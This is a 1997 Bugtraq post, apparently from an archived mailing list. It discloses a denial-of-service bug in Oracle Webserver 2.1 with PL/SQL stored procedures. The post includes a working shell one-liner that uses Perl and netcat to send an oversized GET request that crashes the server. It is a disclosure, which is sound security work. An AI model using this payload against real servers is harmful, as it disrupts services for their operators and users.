DoS against Oracle Webserver 2.1 with PL/SQL stored procedures

Simon Josefsson (jas@PDC.KTH.SE)
Wed, 23 Jul 1997 00:15:31 +0200

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: Theo de Raadt: "Re: better snprintf replacement, anyone?"
Previous message: Alfred Huger: "Re: CERT does it again."
Next in thread: Ross Potts: "Re: DoS against Oracle Webserver 2.1 with PL/SQL stored procedures"

Fellow bugtraqers, I stumpled over this tonight. It's a DoS-attack
against a Oracle Webserver 2.1 that serves PL/SQL stored procedures.

The server dumps quietly, I haven't found anything in the logs. v2.0
does not seem to exhibit this behaviour (v2.1 is the latest, but many
sites seem to still run v2.0).

I'm sorry if this is old news (but I'd appreciate of someone told me
if there is a bugfix somewhere).

(PL/SQL is, simply put, a scripting language within the Oracle database)

--- #!/bin/sh # # requires Perl and NetCat. # # usage: # prg <host> <port> <path> # # example: # # ./prg your.own.domain.com 80 /ows-bin # # if you have the PL/SQL stored procedure in /ows-bin/. # perl -e 'print "GET $ARGV[0]/fnord?foo=", "a" x 2600, " HTTP/1.0\n\n\n\n";' "$3"|nc $1 $2

---

Next message: Theo de Raadt: "Re: better snprintf replacement, anyone?"
Previous message: Alfred Huger: "Re: CERT does it again."
Next in thread: Ross Potts: "Re: DoS against Oracle Webserver 2.1 with PL/SQL stored procedures"